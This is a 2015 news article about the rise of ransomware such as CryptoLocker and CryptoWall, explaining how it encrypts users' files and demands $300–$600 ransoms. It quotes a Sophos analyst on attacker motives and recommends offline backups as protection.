May 18, 2015 8:32 AM
There’s an old Internet scam floating around that’s getting some new attention lately.
It’s called “ransomware,” and if you’re unlucky, it may have already infected your computer or mobile phone.
Ransomware is a term used for a specific type of malware that secretly locks up certain files on your computer, putting them out of reach to everyone but the crook.
Earlier this year, the FBI issued a warning, alerting the public to a recent rise in the spread of ransomware in the U.S.
Two of the most pervasive bugs, CryptoLocker and CryptoWall, are thought to have bilked millions of dollars from unsuspecting users, and have recently begun spreading through Japan, Australia, and several other nations.
The cybersecurity firm Websense says it alone has detected about 2 million instances of Cryptolocker, with more than 60 percent of those detections targeting computers in Australia.
And researchers at anti-virus firm Symantec say a newer ransomware bug, apparently designed to contain several references to the TV series "Breaking Bad," is rapidly spreading around the world.
It works like this: a ransomware bug quietly searches out certain types of files in your computer and, without your knowledge, encrypts them. Once encrypted, a user won’t be able to access those encrypted files without the decryption key, held by the bad guys.
Users are then notified, usually via a pop-up message, that all their files are now inaccessible, and will remain so unless the user pays a fee to the bad guy in exchange for the decryption key to unlock their documents.
It’s almost as if someone digitally stole all your data and promised to sell it back to you only after you paid a fee.
“Ransomware looks for specific types of files to encrypt, traditionally,” said John Shier, a senior security analyst at the cybersecurity firm Sophos. “It’s looking for what we call user-generated content – word documents, spreadsheets, pictures. These could be pictures of your child’s first birthday, videos of your honeymoon, financial spreadsheets of your small business; files that you really care about.”
The ransom typically is costly enough to hurt but not so expensive that users might just give up and abandon their data, usually in the $300 to $600 range.
“This is a business they’re running; in order for them to provide a product that is going to be successful, they can’t price themselves out of the market,” Shier said. “So that dollar figure has been pretty consistent. That price figure is just that – low enough that if you don’t have a way of getting out of this, it’s going to hurt a little bit, but not so much that you’re willing to give up your files.”
Once payment is made, often via Bitcoin or pre-paid credit cards, the bad guys hand over the decryption key, But there’s no guarantee that will happen.
“I get that question a lot – will they turn over the decryption key?” Shier asked. “They absolutely do, because this is basically a business. They want it known that other people who have been hit by this can say ‘Well, I paid them and got my files back.’ If you pay, you get your files back – that’s just good business.”
Although they’re relatively simple in design, ransomware bugs often use a 256-bit AES encryption standard, making them theoretically impossible to crack without the decryption key.
“There’s really nothing you can do,” once you’re files have been locked, Shier said.
Ransomware is indiscriminate in its targets, hitting personal, corporate and government computer systems alike.
“They don’t care who they grab – it’s spray and pray,” Shier said. “The corporate world is least likely to pay because they’re most likely to have mitigations in place, meaning the most success the bad guys are seeing is off the public.”
Even though it’s pretty much too late to do anything once a device has been infected and locked down, there are ways to protect against ransomware, or mitigate the damage once infected. The first and best, said Shier, is to backup all your files repeatedly, and in separate locations.
“The key is to store your backed-up files someplace inaccessible,” he said. “Taking the backup off the network is absolutely essential. And if you re-image [reload backed-up files] on a clean machine, you have to make sure you address how you got infected in the first place.”